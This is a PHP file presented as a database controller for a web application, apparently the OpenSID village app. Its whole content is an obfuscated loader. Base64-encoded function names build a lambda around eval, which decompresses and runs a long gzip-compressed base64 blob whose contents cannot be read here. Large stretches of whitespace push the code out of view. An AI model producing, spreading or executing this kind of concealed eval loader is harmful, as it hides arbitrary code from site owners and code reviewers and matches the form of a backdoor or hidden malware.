<?php 
        $__='printf';$_='Loading donjo-app/controllers/Database.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
